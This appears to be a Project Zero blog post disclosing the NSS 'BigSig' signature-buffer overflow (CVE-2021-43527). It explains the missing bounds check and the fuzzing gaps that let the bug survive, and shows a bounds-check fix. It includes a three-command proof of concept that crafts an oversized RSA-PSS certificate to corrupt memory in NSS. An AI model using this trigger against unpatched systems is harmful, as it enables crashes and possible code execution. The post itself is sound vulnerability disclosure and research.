Posted by Tavis Ormandy, Project Zero
This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.
In 2021, all good bugs need a catchy name, so I’m calling this one “BigSig”.
First, let’s take a look at the bug; then I’ll explain how I found it and try to understand why we missed it for so long.
Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.
struct VFYContextStr {
    SECOidTag hashAlg; /* the hash algorithm */
    SECKEYPublicKey *key;
    union {
        unsigned char buffer[1];
        unsigned char dsasig[DSA_MAX_SIGNATURE_LEN];
        unsigned char ecdsasig[2 * MAX_ECKEY_LEN];
        unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8];
    } u;
    unsigned int pkcs1RSADigestInfoLen;
    unsigned char *pkcs1RSADigestInfo;
    void *wincx;
    void *hashcx;
    const SECHashObject *hashobj;
    SECOidTag encAlg; /* enc alg */
    PRBool hasSignature;
    SECItem *params;
};
Fig 1. The VFYContext structure from NSS.
The maximum signature size this structure can handle is that of the largest union member; in this case that’s the RSA member, at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.
Okay, but what happens if you just....make a signature that’s bigger than that?
Well, it turns out the answer is memory corruption. Yes, really.
The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.
The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:
# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj,
# which contains function pointers (bigger would work too, but takes longer to generate).
$ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key

# Generate a self-signed certificate from that key
$ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer

# Verify it with NSS...
$ vfychain -a bigsig.cer
Segmentation fault
Fig 2. Reproducing the BigSig vulnerability in three easy commands.
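If you’re wondering where those extra 32 + 64 + 64 + 64 bits land, the members that follow the union in Fig 1 are the answer. Here is a standalone mock-up you can compile and run to see the layout for yourself (NSS types are replaced with plain pointers, and the exact offsets depend on your ABI and compiler padding, so treat it as illustrative):

#include <stdio.h>
#include <stddef.h>

/* Mock-up of VFYContextStr from Fig 1, with NSS types replaced and the
 * union collapsed to its largest member. Offsets vary with padding. */
struct mock_vfy_context {
    int hashAlg;
    void *key;
    union {
        unsigned char buffer[1];
        unsigned char rsasig[(16384 + 7) / 8]; /* 2048 bytes */
    } u;
    unsigned int pkcs1RSADigestInfoLen;
    unsigned char *pkcs1RSADigestInfo;
    void *wincx;
    void *hashcx;
    const void *hashobj; /* a table of function pointers in the real structure */
};

int main(void)
{
    struct mock_vfy_context cx;

    /* Everything between the end of u and hashobj is what the oversized
     * signature from Fig 2 tramples on its way to the function pointers. */
    printf("u ends                @ %zu\n", offsetof(struct mock_vfy_context, u) + sizeof cx.u);
    printf("pkcs1RSADigestInfoLen @ %zu\n", offsetof(struct mock_vfy_context, pkcs1RSADigestInfoLen));
    printf("pkcs1RSADigestInfo    @ %zu\n", offsetof(struct mock_vfy_context, pkcs1RSADigestInfo));
    printf("wincx                 @ %zu\n", offsetof(struct mock_vfy_context, wincx));
    printf("hashcx                @ %zu\n", offsetof(struct mock_vfy_context, hashcx));
    printf("hashobj               @ %zu\n", offsetof(struct mock_vfy_context, hashobj));
    return 0;
}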
The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.
case rsaPssKey:
    sigLen = SECKEY_SignatureLen(key);
    if (sigLen == 0) {
        /* error set by SECKEY_SignatureLen */
        rv = SECFailure;
        break;
    }
    if (sig->len != sigLen) {
        PORT_SetError(SEC_ERROR_BAD_SIGNATURE);
        rv = SECFailure;
        break;
    }
    PORT_Memcpy(cx->u.buffer, sig->data, sigLen);
    break;
Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob.
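For illustration, all that’s missing is a check that the signature actually fits in the union. Something like the following sketch would close the hole (this shows the general shape of the missing check, not necessarily the exact upstream patch):

case rsaPssKey:
    sigLen = SECKEY_SignatureLen(key);
    /* Reject keys whose signatures cannot possibly fit in cx->u. */
    if (sigLen == 0 || sigLen > sizeof(cx->u)) {
        PORT_SetError(SEC_ERROR_BAD_SIGNATURE);
        rv = SECFailure;
        break;
    }
    if (sig->len != sigLen) {
        PORT_SetError(SEC_ERROR_BAD_SIGNATURE);
        rv = SECFailure;
        break;
    }
    PORT_Memcpy(cx->u.buffer, sig->data, sigLen);
    break;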
I think this vulnerability raises a few immediate questions about how it survived undetected for so long, so let me address the obvious explanations first.
This wasn’t a process failure; the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties, and they invest in memory safety, fuzzing, and test coverage.
NSS was one of the very first projects included in oss-fuzz, and it has been officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive test suite, and there are nightly ASAN builds.
I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.
Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.
I've been experimenting with alternative methods for measuring code coverage, to see if any of them have practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches: stack coverage and object isolation.
The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.
#include <stdio.h>
#include <string.h>
#include <limits.h>

static char buf[128];

void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); }
void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); }
void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); }

typedef void (*dispatch_t)(int, size_t);

/* One slot per possible getchar() value (0..UCHAR_MAX). */
dispatch_t handlers[UCHAR_MAX + 1] = {
    cmd_handler_foo,
    cmd_handler_bar,
    cmd_handler_baz,
};

int main(int argc, char **argv)
{
    int cmd;

    while ((cmd = getchar()) != EOF) {
        if (handlers[cmd]) {
            handlers[cmd](getchar(), getchar());
        }
    }
}
Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1]
To solve this problem, I’ve been experimenting with monitoring the call stack during execution.
The naive implementation is too slow to be practical, but after a lot of optimization I came up with a library fast enough to be integrated into coverage-guided fuzzing, and I was testing how it performed with NSS and other libraries.
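To give a flavor of the naive approach (this is a simplified sketch, not the optimized library described above): with GCC and Clang’s -finstrument-functions, every function entry and exit can maintain a hash of the current call stack, and each distinct stack shape becomes a coverage point. A real implementation would also need stable function identifiers rather than raw addresses, since ASLR makes those vary between runs.

#include <stdint.h>
#include <stddef.h>

#define MAP_SIZE  65536
#define MAX_DEPTH 512

uint8_t stack_cov_map[MAP_SIZE];    /* coverage bitmap consumed by the fuzzer */
static uintptr_t shadow[MAX_DEPTH]; /* shadow stack of incremental hashes     */
static size_t depth;

/* Called on every function entry when built with -finstrument-functions. */
__attribute__((no_instrument_function))
void __cyg_profile_func_enter(void *fn, void *call_site)
{
    (void) call_site;
    if (depth < MAX_DEPTH) {
        /* Hash of the whole stack = hash of the parent stack + callee. */
        uintptr_t parent = depth ? shadow[depth - 1] : 0;
        shadow[depth] = parent * 31 + (uintptr_t) fn;
        stack_cov_map[shadow[depth] % MAP_SIZE] = 1;
    }
    depth++;
}

/* Called on every function exit; just pop the shadow stack. */
__attribute__((no_instrument_function))
void __cyg_profile_func_exit(void *fn, void *call_site)
{
    (void) fn;
    (void) call_site;
    if (depth)
        depth--;
}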
Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.
The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but it is a new implementation. I'm planning to open source this code in the future.
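The record-isolation part is less magic than it might sound. A DER-encoded certificate is just nested tag-length-value items, so a few dozen lines of code suffice to find the boundaries of every record. The sketch below is illustrative, not my fuzzer’s actual implementation; it reports the offset and length of each item so a mutator could cut records out and splice them into template data:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Minimal DER TLV walker: prints the offset and size of every item,
 * recursing into constructed types (SEQUENCEs, SETs, and so on). */
static void walk_tlv(const uint8_t *p, size_t len, int depth)
{
    size_t i = 0;

    while (i + 2 <= len) {
        uint8_t tag  = p[i];
        size_t  hdr  = 2;
        size_t  vlen = p[i + 1];

        if (vlen & 0x80) {                       /* long-form length */
            size_t n = vlen & 0x7f;
            if (n == 0 || n > sizeof(size_t) || i + 2 + n > len)
                return;                          /* indefinite or malformed */
            vlen = 0;
            for (size_t j = 0; j < n; j++)
                vlen = (vlen << 8) | p[i + 2 + j];
            hdr = 2 + n;
        }

        if (vlen > len - i - hdr)
            return;                              /* truncated value */

        printf("%*stag 0x%02x @ %zu, %zu bytes\n", depth * 2, "", tag, i, vlen);

        if (tag & 0x20)                          /* constructed: recurse */
            walk_tlv(p + i + hdr, vlen, depth + 1);

        i += hdr + vlen;
    }
}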
I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.
How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?
NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { char *dest[2048]; for (auto tpl : templates) { PORTCheapArenaPool pool; SECItem buf = {siBuffer, const_cast<unsigned char *>(Data), static_cast<unsigned int>(Size)}; PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE); (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf); PORT_DestroyCheapArena(&pool); } |
Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly.
This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.
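For contrast, a harness only has to go one step further to reach the vulnerable code. Something along these lines (a sketch, not the actual NSS fuzzer; build flags and error handling elided) would have exercised signature verification with the parsed object:

#include <stdint.h>
#include <stddef.h>

#include "nss.h"
#include "cert.h"
#include "prtime.h"

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    // One-time library setup, without a certificate database.
    static const SECStatus init = NSS_NoDB_Init(nullptr);
    (void)init;

    SECItem der = {siBuffer, const_cast<unsigned char *>(Data),
                   static_cast<unsigned int>(Size)};

    CERTCertificate *cert = CERT_NewTempCertificate(
        CERT_GetDefaultCertDB(), &der, nullptr, PR_FALSE, PR_TRUE);

    if (cert) {
        // Actually *use* the parsed object: checking the certificate's own
        // signature reaches the VFYContext copy shown in Fig 3.
        (void)CERT_VerifySignedData(&cert->signatureWrap, cert, PR_Now(),
                                    nullptr);
        CERT_DestroyCertificate(cert);
    }

    return 0;
}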
There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.
A reasonable choice might be 2^24-1 bytes, the largest possible certificate that can be presented by a server during a TLS handshake (certificate lengths are encoded in a 24-bit field).
While NSS might handle objects even larger than this, TLS cannot possibly be involved in delivering them, which reduces the severity of any vulnerabilities missed above that size.
oss-fuzz reports combined coverage metrics for all of the NSS fuzzers, rather than per-fuzzer coverage. This data proved misleading: the vulnerable code appears to be fuzzed extensively, but only by fuzzers that could not possibly generate a relevant input.
This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.
It’s debatable whether this was just good fortune or not: mozilla::pkix does not currently permit RSA-PSS signatures, but it seems likely that it eventually would.
This issue demonstrates that even extremely well-maintained C/C++ code can contain fatal, trivial mistakes.
This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.
I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.
Thanks to the NSS team, who helped triage and analyze the vulnerability.
[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.